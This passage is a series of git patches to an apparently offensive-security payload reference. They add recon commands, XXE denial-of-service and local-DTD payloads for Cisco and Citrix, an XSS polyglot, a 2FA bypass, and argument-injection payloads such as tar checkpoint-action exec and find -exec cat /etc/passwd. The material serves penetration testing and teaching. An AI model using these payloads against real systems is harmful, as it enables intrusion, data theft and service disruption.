Vulnerabilities](#looking-for-web-vulnerabilities) - * Repository Github - * Burp - * Web Checklist - * Nikto - * Payment functionality ## Passive recon -* Using Shodan (https://www.shodan.io/) to detect similar app +* Using [Shodan](https://www.shodan.io/) to detect similar app ```bash can be integrated with nmap (https://github.com/glennzw/shodan-hq-nse) nmap --script shodan-hq.nse --script-args 'apikey=,target=' ``` -* Using The Wayback Machine (https://archive.org/web/) to detect forgotten endpoints +* Using [The Wayback Machine](https://archive.org/web/) to detect forgotten endpoints ```bash look for JS files, old links curl -sX GET "http://web.archive.org/cdx/search/cdx?url=&output=text&fl=original&collapse=urlkey&matchType=prefix" ``` -* Using The Harvester (https://github.com/laramies/theHarvester) +* Using [The Harvester](https://github.com/laramies/theHarvester) ```python python theHarvester.py -b all -d domain.com ``` -## Active recon - -* [Network discovery](Network%20Discovery.md) with masscan, nmap etc. - -* rpcclient - +* Look for private information in [GitHub]() repos with [GitRob](https://github.com/michenriksen/gitrob.git) ```bash - $ rpcclient -U '%' [target host] - rpcclient $> querydominfo - Domain: WORKGROUP - Server: METASPLOITABLE - Comment: metasploitable server (Samba 3.0.20-Debian) - Total Users: 35 - - rpcclient $> enumdomusers - user:[games] rid:[0x3f2] - user:[nobody] rid:[0x1f5] - user:[bind] rid:[0x4ba] + gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2 ``` -* enum4linux - ```bash - enum4linux v0.8.9 (http://labs.portcullis.co.uk/application/enum4linux/) - Usage: ./enum4linux.pl [options] ip - -U get userlist - -M get machine list* - -S get sharelist - -P get password policy information - -G get group and member list - -d be detailed, applies to -U and -S - -u user specify username to use (default “”) - -p pass specify password to use (default “” - -a Do all simple enumeration (-U -S -G -P -r -o -n -i). - -o Get OS information - -i Get printer information - ============================== - | Users on XXX.XXX.XXX.XXX | - ============================== - index: 0x1 Account: games Name: games Desc: (null) - index: 0x2 Account: nobody Name: nobody Desc: (null) - index: 0x3 Account: bind Name: (null) Desc: (null) - index: 0x4 Account: proxy Name: proxy Desc: (null) - index: 0x5 Account: syslog Name: (null) Desc: (null) - index: 0x6 Account: user Name: just a user,111,, Desc: (null) - index: 0x7 Account: www-data Name: www-data Desc: (null) - index: 0x8 Account: root Name: root Desc: (null) - ``` +## Active recon -* Zone Transfer +### Network discovery - ```powershell +* Subdomains enumeration + * [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder): `subfinder -d hackerone.com` + +* Network discovery + * Scan IP ranges with `nmap`, [robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) and [projectdiscovery/naabu](https://github.com/projectdiscovery/naabu) + * Discover services, version and banners + +* ASN enumeration + * [projectdiscovery/asnmap](https://github.com/projectdiscovery/asnmap): `asnmap -a AS45596 -silent` + +* DNS Zone Transfer + ```ps1 host -t ns domain.local domain.local name server master.domain.local. @@ -106,105 +67,66 @@ dig axfr domain.local @192.168.1.1 ``` -## List all the subdirectories and files +### Web discovery -* Using BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code. +* List all the subdirectories and files with `gobuster` or `ffuf` + ```ps1 + # gobuster -w wordlist -u URL -t threads + ./gobuster -u http://example.com/ -w words.txt -t 10 + ``` +* Find backup files with [mazen160/bfac](https://github.com/mazen160/bfac) ```bash - git clone https://github.com/mazen160/bfac - - Check a single URL bfac --url http://example.com/test.php --level 4 - - Check a list of URLs bfac --list testing_list.txt ``` -* Using DirBuster or GoBuster +* Map technologies: Web service enumeration using [projectdiscovery/httpx](https://github.com/projectdiscovery/httpx) or Wappalyzer + * Gather favicon hash, JARM fingerprint, ASN, status code, services and technologies (Github Pages, Cloudflare, Ruby, Nginx,...) - ```bash - ./gobuster -u http://buffered.io/ -w words.txt -t 10 - -u url - -w wordlist - -t threads +* Take screenshots for every websites using [sensepost/gowitness](https://github.com/sensepost/gowitness) - More subdomain : - ./gobuster -m dns -w subdomains.txt -u google.com -i +* Automated vulnerability scanners + * [projectdiscovery/nuclei](https://github.com/projectdiscovery/nuclei): `nuclei -u https://example.com` + * [Burp Suite's web vulnerability scanner](https://portswigger.net/burp/vulnerability-scanner) + * [sullo/nikto](https://github.com/sullo/nikto): `./nikto.pl -h http://www.example.com` - gobuster -w wordlist -u URL -r -e - ``` +* Manual Testing: Explore the website with a proxy: + * [Caido - A lightweight web security auditing toolkit](https://caido.io/) + * [ZAP - OWASP Zed Attack Proxy](https://www.zaproxy.org/) + * [Burp Suite - Community Edition](https://portswigger.net/burp/communitydownload) -* Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois) - - ```bash - #!/bin/bash - for ipa in 98.13{6..9}.{0..255}.{0..255}; do - wget -t 1 -T 3 http://${ipa}/phpinfo.php; done & - ``` - -* Using a script to detect all .htpasswd files in a range of IPs - - ```bash - #!/bin/bash - for ipa in 98.13{6..9}.{0..255}.{0..255}; do - wget -t 1 -T 3 http://${ipa}/.htpasswd; done & - ``` ## Looking for Web vulnerabilities -* Look for private information in GitHub repos with GitRob - - ```bash - git clone https://github.com/michenriksen/gitrob.git - gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2 - ``` - -* Explore the website with a proxy (ZAP/Burp Suite) - 1. Start proxy, visit the main target site and perform a Forced Browse to discover files and directories - 2. Map technologies used with Wappalyzer and Burp Suite (or ZAP) proxy - 3. Explore and understand available functionality, noting areas that correspond to vulnerability types - - ```bash - Burp Proxy configuration on port 8080 (in .bashrc): - alias set_proxy_burp='gsettings set org.gnome.system.proxy.http host "http://localhost";gsettings set org.gnome.system.proxy.http port 8080;gsettings set org.gnome.system.proxy mode "manual"' - alias set_proxy_normal='gsettings set org.gnome.system.proxy mode "none"' - - then launch Burp with : java -jar burpsuite_free_v*.jar & - ``` - -* [WAHH Task Checklist](https://gist.github.com/gbedoya/10935137) copied from http://mdsec.net/wahh/tasks.html +* Explore the website and look for vulnerabilities listed in this repository: SQL injection, XSS, CRLF, .... +* [The Web Application Hacker's Handbook Checklist](https://gist.github.com/gbedoya/10935137) copied from http://mdsec.net/wahh/tasks.html * Subscribe to the site and pay for the additional functionality to test -* Launch a Nikto scan in case you missed something - - ```powershell - nikto -h http://domain.example.com - ``` - -* Payment functionality - [@gwendallecoguic](https://twitter.com/gwendallecoguic/status/988138794686779392) +* Inspect Payment functionality - [@gwendallecoguic](https://twitter.com/gwendallecoguic/status/988138794686779392) > if the webapp you're testing uses an external payment gateway, check the doc to find the test credit numbers, purchase something and if the webapp didn't disable the test mode, it will be free From https://stripe.com/docs/testing#cards : "Use any of the following test card numbers, a valid expiration date in the future, and any random CVC number, to create a successful payment. Each test card's billing country is set to U.S. " e.g : -Test card numbers and tokens + Test card numbers and tokens -| NUMBER | BRAND | TOKEN | -| :------------- | :------------- | :------------- | -| 4242424242424242 | Visa | tok_visa | -| 4000056655665556 | Visa (debit) | tok_visa_debit | -| 5555555555554444 | Mastercard | tok_mastercard | + | NUMBER | BRAND | TOKEN | + | :------------- | :------------- | :------------- | + | 4242424242424242 | Visa | tok_visa | + | 4000056655665556 | Visa (debit) | tok_visa_debit | + | 5555555555554444 | Mastercard | tok_mastercard | -International test card numbers and tokens + International test card numbers and tokens -| NUMBER | TOKEN | COUNTRY | BRAND | -| :------------- | :------------- | :------------- | :------------- | -| 4000000400000008 | tok_at | Austria (AT) | Visa | -| 4000000560000004 | tok_be | Belgium (BE) | Visa | -| 4000002080000001 | tok_dk | Denmark (DK) | Visa | -| 4000002460000001 | tok_fi | Finland (FI) | Visa | -| 4000002500000003 | tok_fr | France (FR) | Visa | + | NUMBER | TOKEN | COUNTRY | BRAND | + | :------------- | :------------- | :------------- | :------------- | + | 4000000400000008 | tok_at | Austria (AT) | Visa | + | 4000000560000004 | tok_be | Belgium (BE) | Visa | + | 4000002080000001 | tok_dk | Denmark (DK) | Visa | + | 4000002460000001 | tok_fi | Finland (FI) | Visa | + | 4000002500000003 | tok_fr | France (FR) | Visa | ## References From 576322d475121f5ecf1199953e7421f0d5eba714 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alexander=20Lu=CC=88beck?= Date: Sun, 2 Oct 2022 15:58:16 +0200 Subject: [PATCH 49/69] Fixed invalid hyperlink --- Methodology and Resources/Active Directory Attack.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 25ade01..c62feae 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -3919,7 +3919,7 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) * [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/) * [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic) -* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/) +* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https://www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/) * [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/) * [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) * [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179) From 6bbdc85aa2dc002c8888252890e84a0f967d59dd Mon Sep 17 00:00:00 2001 From: Quentin Ligier Date: Mon, 3 Oct 2022 17:14:22 +0200 Subject: [PATCH 50/69] XXE: Improve the documentation - Add two references: "OWASP XXE prevention cheat sheet" and "XXE: How to become a Jedi" - Describe the Parameters Laugh attack - Expand the WAF bypass method with UTF-7 - Update the summary --- XXE Injection/README.md | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index 8136e66..b10c845 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -20,6 +20,8 @@ Syntax: `` - [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks) - [Exploiting XXE to perform a deny of service](#exploiting-xxe-to-perform-a-deny-of-service) - [Billion Laugh Attack](#billion-laugh-attack) + - [Yaml attack](#yaml-attack) + - [Parameters Laugh attack](#parameters-laugh-attack) - [Error Based XXE](#error-based-xxe) - [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band) - [Blind XXE](#blind-xxe) @@ -228,6 +230,20 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] ``` +### Parameters Laugh attack + +A variant of the Billion Laughs attack, using delayed interpretation of parameter entities, by Sebastian Pipping. + +```xml +"> + %pe_1;"> + %pe_2;"> + %pe_3;"> + %pe_4; +]> + +``` ## Error Based XXE @@ -591,6 +607,7 @@ we can convert the character encoding to `UTF-16` using [iconv](https://man7.org ```bash cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml ``` +UTF-7 encoding can be used as well to bypass UTF-8/UTF-16 rules. ## Labs @@ -599,6 +616,7 @@ cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml ## References * [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing) +* [XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html) * [Detecting and exploiting XXE in SAML Interfaces](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) - 6. Nov. 2014 - Von Christian Mainka * [[Gist] staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4) * [[Gist] mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) @@ -619,3 +637,4 @@ cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml * [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube) * [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon * [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK +* [XXE: How to become a Jedi](https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf) - Zeronights 2017 - Yaroslav Babin From f8d04cef3baceda26c4234dbcba423388be77d8e Mon Sep 17 00:00:00 2001 From: Markus Date: Mon, 3 Oct 2022 17:51:39 +0200 Subject: [PATCH 51/69] CVE Exploit: Add trickest CVE repo --- CVE Exploits/README.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/CVE Exploits/README.md b/CVE Exploits/README.md index 821abc8..57d62ce 100644 --- a/CVE Exploits/README.md +++ b/CVE Exploits/README.md @@ -1,5 +1,9 @@ # Common Vulnerabilities and Exposures +## Tools + +- [Trickest CVE Repository - Automated collection of CVEs and PoC's](https://github.com/trickest/cve) + ## Big CVEs in the last 5 years. ### CVE-2017-0144 - EternalBlue From 950114b9e641c7cf481aa366216b83c7afbc2762 Mon Sep 17 00:00:00 2001 From: Markus Date: Mon, 3 Oct 2022 18:19:28 +0200 Subject: [PATCH 52/69] Zip Slip: Add slipit to tools --- Upload Insecure Files/Zip Slip/README.md | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/Upload Insecure Files/Zip Slip/README.md b/Upload Insecure Files/Zip Slip/README.md index 39d647e..75b5dd6 100644 --- a/Upload Insecure Files/Zip Slip/README.md +++ b/Upload Insecure Files/Zip Slip/README.md @@ -4,11 +4,11 @@ ## Summary -- [Detection](#detection) -- [Tools](#tools) +* [Detection](#detection) +* [Tools](#tools) * [Exploits](#exploits) * [Basic Exploit](#basic-exploit) -- [Additional Notes](#additional-notes) +* [Additional Notes](#additional-notes) ## Detection @@ -16,12 +16,14 @@ ## Tools -- evilarc [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc) +- [evilarc](https://github.com/ptoomey3/evilarc) +- [slipit](https://github.com/usdAG/slipit) ## Exploits ### Basic Exploit +Using evilarc: ```python python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15 ``` From 3022c25995037fe81a94eb1602ace1c30b45a1e7 Mon Sep 17 00:00:00 2001 From: Varun Jagtap Date: Wed, 5 Oct 2022 12:50:10 +0530 Subject: [PATCH 53/69] Added portswigger labs and reference --- Command Injection/README.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/Command Injection/README.md b/Command Injection/README.md index e98534a..cd41aec 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -297,9 +297,18 @@ echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep( echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/' ``` +## Labs + +* [OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple) +* [Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays) +* [Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection) +* [Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band) +* [Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration) + ## References * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/) * [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136) * [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628) * [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192) +* [What is OS command injection - portswigger](https://portswigger.net/web-security/os-command-injection) From 2d03a7455585fdd9a5d50cbb97e211532b3a8b83 Mon Sep 17 00:00:00 2001 From: gdraperi <33750242+gdraperi@users.noreply.github.com> Date: Wed, 5 Oct 2022 10:06:21 +0200 Subject: [PATCH 54/69] Update README.md Adding payloads for Citrix and Cisco --- XXE Injection/README.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index b10c845..a6f5ffa 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -388,6 +388,19 @@ Assuming payloads such as the previous return a verbose error. You can start poi ]> ``` +### Cisco WebEx +``` + +Your DTD code +%local_dtd; +``` +### Citrix XenMobile Server +``` + +Your DTD code +%local_dtd; +``` +[Payloads for Cisco and Citrix](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) [Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) From 643374e1d77141f537df49b146186e19eb6cc76e Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 5 Oct 2022 10:20:05 +0200 Subject: [PATCH 55/69] Add reference --- XXE Injection/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index a6f5ffa..af91358 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -400,8 +400,6 @@ Assuming payloads such as the previous return a verbose error. You can start poi Your DTD code %local_dtd; ``` -[Payloads for Cisco and Citrix](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) - [Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) @@ -651,3 +649,5 @@ UTF-7 encoding can be used as well to bypass UTF-8/UTF-16 rules. * [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon * [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK * [XXE: How to become a Jedi](https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf) - Zeronights 2017 - Yaroslav Babin +* [Payloads for Cisco and Citrix - Arseniy Sharoglazov](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) + From 2aa353a5b92a14110f651f5c9c6059f08c42fabd Mon Sep 17 00:00:00 2001 From: clem9669 <18504086+clem9669@users.noreply.github.com> Date: Wed, 5 Oct 2022 09:45:15 +0000 Subject: [PATCH 56/69] Update XSS_Polyglots.txt Adding the latest BruteLogic polyglot --- XSS Injection/Intruders/XSS_Polyglots.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/XSS Injection/Intruders/XSS_Polyglots.txt b/XSS Injection/Intruders/XSS_Polyglots.txt index 52ede63..8d92c85 100644 --- a/XSS Injection/Intruders/XSS_Polyglots.txt +++ b/XSS Injection/Intruders/XSS_Polyglots.txt @@ -13,3 +13,4 @@ javascript:alert()//-->*/alert()/* javascript://-->*/alert()/* +JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*\74k From 7e82d93897b4b94e7d869dc1af5125634f4eec8b Mon Sep 17 00:00:00 2001 From: Nayeem Islam Date: Wed, 5 Oct 2022 17:42:01 +0600 Subject: [PATCH 57/69] Added 2FA bypass via Force Browsing on Account Takeover branch --- Account Takeover/README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/Account Takeover/README.md b/Account Takeover/README.md index 5db6c97..3eebf6b 100644 --- a/Account Takeover/README.md +++ b/Account Takeover/README.md @@ -27,6 +27,7 @@ * [Backup Code Abuse](#backup-code-abuse) * [Clickjacking on 2FA Disabling Page](#clickjacking-on-2fa-disabling-page) * [Enabling 2FA doesn't expire Previously active Sessions](#enabling-2fa-doesnt-expire-previously-active-sessions) + * [Bypass 2FA by Force Browsing](#bypass-2fa-by-force-browsing) * [Bypass 2FA with null or 000000](#bypass-2fa-with-null-or-000000) * [Bypass 2FA with array](#bypass-2fa-with-array) * [References](#references) @@ -228,6 +229,10 @@ Iframing the 2FA Disabling page and social engineering victim to disable the 2FA If the session is already hijacked and there is a session timeout vuln +### Bypass 2FA by Force Browsing + +If the application redirects to `/my-account` url upon login while 2Fa is disabled, try replacing `/2fa/verify` with `/my-account` while 2FA is enabled to bypass verification. + ### Bypass 2FA with null or 000000 Enter the code **000000** or **null** to bypass 2FA protection. @@ -262,3 +267,4 @@ Enter the code **000000** or **null** to bypass 2FA protection. - [Broken Cryptography & Account Takeovers - Harsh Bothra - September 20, 2020](https://speakerdeck.com/harshbothra/broken-cryptography-and-account-takeovers?slide=28) - [Hacking Grindr Accounts with Copy and Paste - Troy HUNT & Wassime BOUIMADAGHENE - 03 OCTOBER 2020](https://www.troyhunt.com/hacking-grindr-accounts-with-copy-and-paste/) - [CTFd Account Takeover](https://nvd.nist.gov/vuln/detail/CVE-2020-7245) +- [2FA simple bypass](https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-simple-bypass) From 666a90ffee340084704f0b245e28fc5dc9f71d85 Mon Sep 17 00:00:00 2001 From: gdraperi <33750242+gdraperi@users.noreply.github.com> Date: Wed, 5 Oct 2022 13:47:24 +0200 Subject: [PATCH 58/69] Update YAML.md Updating the actual risks for Python --- Insecure Deserialization/YAML.md | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/Insecure Deserialization/YAML.md b/Insecure Deserialization/YAML.md index 326394c..d931178 100644 --- a/Insecure Deserialization/YAML.md +++ b/Insecure Deserialization/YAML.md @@ -43,6 +43,16 @@ state: !!python/tuple update: !!python/name:exec ``` +Since PyYaml version 6.0, the default loader for ```load``` has been switched to SafeLoader mitigating the risks against Remote Code Execution. +[PR fixing the vulnerabily](https://github.com/yaml/pyyaml/issues/420) + +The vulnerable sinks are now ```yaml.unsafe_load``` and ```yaml.load(input, Loader=yaml.UnsafeLoader)``` + +``` +with open('exploit_unsafeloader.yml') as file: + data = yaml.load(file,Loader=yaml.UnsafeLoader) +``` + ## Ruamel.yaml ## Ruby @@ -86,4 +96,4 @@ state: !!python/tuple * [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13][https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf] * [PyYAML Documentation](https://pyyaml.org/wiki/PyYAMLDocumentation) * [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/) -* [[CVE-2019-20477]- 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - @_j0lt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/) \ No newline at end of file +* [[CVE-2019-20477]- 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - @_j0lt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/) From 69c6ee87c68d7695ba8cbe13bdc7dcc56186777d Mon Sep 17 00:00:00 2001 From: gregory draperi Date: Thu, 6 Oct 2022 16:56:44 +0200 Subject: [PATCH 59/69] Argument Injection technique --- Argument Injection/README.md | 91 ++++++++++++++++++++++++++++++++++++ 1 file changed, 91 insertions(+) create mode 100644 Argument Injection/README.md diff --git a/Argument Injection/README.md b/Argument Injection/README.md new file mode 100644 index 0000000..04f7ea1 --- /dev/null +++ b/Argument Injection/README.md @@ -0,0 +1,91 @@ +# Argument Injection +Argument injection is similar to command injection as tainted data is passed to to a command executed in a shell without proper sanitization/escaping. + +It can happen in different situations, where you can only inject arguments to a command: + +- Improper sanitization (regex) +- Injection of arguments into a fixed command (PHP:escapeshellcmd, Python: Popen) +- Bash expansion (ex: *) + +In the following example, a python script takes the inputs from the command line to generate a ```curl``` command: +``` +from shlex import quote,split +import sys +import subprocess + +if __name__=="__main__": + command = ['curl'] + command = command + split(sys.argv[1]) + print(command) + r = subprocess.Popen(command) +``` +It is possible for an attacker to pass several words to abuse options from ```curl``` command +``` +python python_rce.py "https://www.google.fr -o test.py" +``` +We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file. +``` +['curl', 'https://www.google.fr', '-o', 'test.py'] +``` +## Summary + +* [List of exposed commands](#List of exposed commands) + * [TAR](#TAR) + * [CURL](#CURL) + * [WGET](#WGET) +* [References](#references) + + +## List of exposed commands + +### CURL +It is possible to abuse ```curl``` through the following options: + +``` + -o, --output Write to file instead of stdout + -O, --remote-name Write output to a file named as the remote file +``` +In case there is already one option in the command it is possible to inject several URLs to download and several output options. Each option will affect each URL in sequence. + +### TAR +For the ```tar``` command it is possible to inject arbitrary arguments in different commands. + +Argument injection can happen into the '''extract''' command: +``` +--to-command +--checkpoint=1 --checkpoint-action=exec= +-T or --files-from +``` + +Or in the '''create''' command: +``` +-I= or -I +--use-compres-program= +``` +There are also short options to work without spaces: +``` +-T +-I"/path/to/exec" +``` + +### FIND +Find some_file inside /tmp directory. +``` +$file = "some_file"; +system("find /tmp -iname ".escapeshellcmd($file)); +``` + +Print /etc/passwd content. +``` +$file = "sth -or -exec cat /etc/passwd ; -quit"; +system("find /tmp -iname ".escapeshellcmd($file)); +``` + + +## References + + +- [staaldraad - Etienne Stalmans, November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/) +- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014] (https://www.exploit-db.com/papers/33930) +- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018] (https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md) + From ba9eb30940f17bd0b2fc6b9e416a3ea43de66ee8 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 6 Oct 2022 17:55:16 +0200 Subject: [PATCH 60/69] Fix links --- Argument Injection/README.md | 26 ++++++++++++-------------- 1 file changed, 12 insertions(+), 14 deletions(-) diff --git a/Argument Injection/README.md b/Argument Injection/README.md index 04f7ea1..acaa3b7 100644 --- a/Argument Injection/README.md +++ b/Argument Injection/README.md @@ -8,7 +8,7 @@ It can happen in different situations, where you can only inject arguments to a - Bash expansion (ex: *) In the following example, a python script takes the inputs from the command line to generate a ```curl``` command: -``` +```py from shlex import quote,split import sys import subprocess @@ -20,16 +20,16 @@ if __name__=="__main__": r = subprocess.Popen(command) ``` It is possible for an attacker to pass several words to abuse options from ```curl``` command -``` +```ps1 python python_rce.py "https://www.google.fr -o test.py" ``` We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file. -``` +```ps1 ['curl', 'https://www.google.fr', '-o', 'test.py'] ``` ## Summary -* [List of exposed commands](#List of exposed commands) +* [List of exposed commands](#list-of-exposed-commands) * [TAR](#TAR) * [CURL](#CURL) * [WGET](#WGET) @@ -41,7 +41,7 @@ We can see by printing the command that all the parameters are splited allowing ### CURL It is possible to abuse ```curl``` through the following options: -``` +```ps1 -o, --output Write to file instead of stdout -O, --remote-name Write output to a file named as the remote file ``` @@ -51,32 +51,32 @@ In case there is already one option in the command it is possible to inject seve For the ```tar``` command it is possible to inject arbitrary arguments in different commands. Argument injection can happen into the '''extract''' command: -``` +```ps1 --to-command --checkpoint=1 --checkpoint-action=exec= -T or --files-from ``` Or in the '''create''' command: -``` +```ps1 -I= or -I --use-compres-program= ``` There are also short options to work without spaces: -``` +```ps1 -T -I"/path/to/exec" ``` ### FIND Find some_file inside /tmp directory. -``` +```php $file = "some_file"; system("find /tmp -iname ".escapeshellcmd($file)); ``` Print /etc/passwd content. -``` +```php $file = "sth -or -exec cat /etc/passwd ; -quit"; system("find /tmp -iname ".escapeshellcmd($file)); ``` @@ -84,8 +84,6 @@ system("find /tmp -iname ".escapeshellcmd($file)); ## References - - [staaldraad - Etienne Stalmans, November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/) -- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014] (https://www.exploit-db.com/papers/33930) -- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018] (https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md) - +- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014](https://www.exploit-db.com/papers/33930) +- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md) From 00189411d4825bc109854328c000dab347653868 Mon Sep 17 00:00:00 